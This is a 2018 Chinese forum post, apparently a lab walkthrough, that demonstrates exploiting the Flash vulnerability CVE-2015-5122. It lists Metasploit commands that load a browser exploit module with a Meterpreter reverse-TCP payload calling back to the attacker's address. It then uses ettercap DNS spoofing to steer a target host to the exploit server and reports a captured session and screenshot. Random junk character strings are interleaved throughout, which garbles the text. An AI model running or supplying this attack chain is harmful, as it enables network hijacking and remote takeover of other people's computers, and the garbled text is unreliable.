找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1325|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ r0 f% d; l/ c* o 二、cve2015-5122漏洞实例演示虚拟机 / @; {- p! v g: `7 b: P1 f& x

3 T# A1 Q T' h9 @

J4 [: q' N* B; s1 K   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: * _" h0 {, \6 f# o1 {

1 |/ J- {9 g# G' d/ a8 g) e; y. O3 c

, x. f( |& {- b- l3 h+ n8 C, t" Q search cve-2015-5122如图: ! g3 }1 f* A; A. T. ]- g* o

) P4 h5 E. L$ x0 \- o4 ]! d

5 X1 F& g2 y6 B( p5 P   / x% i0 L% y/ A0 y, D# L m

' y9 W" O7 M9 H4 ?/ ?

: _4 v7 I/ X# x5 a 下面我们敲如下命令: * ]( f1 i: l7 e

! O# A2 |6 |* _. B

5 q% A# |# K9 _- T8 Y use exploit/multi/browser/adobe_flash_opaque_background_uaf ' H& K/ |" D- Y" W3 y3 q

\4 p% { Q) m2 V6 r. Z/ k

/ {+ W2 A; E8 T% O4 U# {7 j set PAYLOAD windows/meterpreter/reverse_tcp 2 q! y2 ~1 j" d2 z0 v

- z1 J+ E( b" g8 G3 V

. m" J+ _4 E/ l set LHOST 192.168.0.109 |" R' ?. l ~( z& p# ]) N/ L+ r8 b

3 E5 \! C4 [/ i4 y, }

: B" A! y, o) x8 z set URIPATH /                        /*根目录*/ * \8 Y+ U* F2 G+ U$ T

* b3 _ w' c8 v7 H

" E A O# e) J9 Q set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 & t8 s$ @) l9 M8 M0 x1 p

, n0 l# q. `; P5 P8 Z5 m5 H

! M, r/ w1 n6 n8 q( s& D( b set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 $ }7 F' l1 Y, [$ Y7 C8 r

- \7 c8 W7 G" n0 V" ~' ~8 U

/ K- R( Q# ] Q3 B7 H 然后show options如图: , m# {5 x* `4 a5 B$ P

( D2 o$ Y5 n- x! r) p

! m9 y. f& C8 f( ~& \4 \0 h   2 g* P) f8 Z; h$ Z

; Y! L# ]* h6 Z- N

# ] ^: o* I, C 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
1 K: q K: G& e+ L
: p( J) B( [7 A! G$ E

- J/ x8 W# P* Q$ x2 b

. z, M2 P5 I; A+ l3 A+ B 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 % t% f- Y# N7 O- f# Y) N; [

* C$ }3 ~% e& d+ H% y7 V

w% \( a6 B% y5 F/ |) ] Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 3 m1 k3 ]. |3 ^5 G8 d! V0 Z: M

# }- b0 a) W. \; D( H

$ [/ P4 E( v0 o( \/ z" t   4 s$ ^ s3 K8 G

# i9 i+ Y8 r/ L+ H0 m. E3 Z" t) Q

& F8 E5 `- s5 W. u 成功了,这时候我们断开ettercap,如图: & F: L, r$ d( v3 P% V- o# e7 C- {/ \

9 n/ m2 U" B5 P, e* U( P

7 E6 e# l7 n* z/ k: R- B   . Z' @, a# E* E9 ^4 D; L q

$ a: x0 C" s4 P$ V p% ?$ q/ \

) a1 F" v( I" I- [; H5 I& K0 a Screenshot如图: 7 j) m, j, n1 }: W& A# w& k

8 N* k, ^8 U* ^& q, @: x: Y' G. ?# M

: A! G: W8 W/ q/ a/ Y* H! f   ! P" l1 ]) O. S+ f8 e

; S9 M8 W* y7 c0 W# y+ f A/ y8 t

! q: R6 H: W9 F. T3 c! n- s# N7 O, } , u% ] S( z$ i- S! e

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表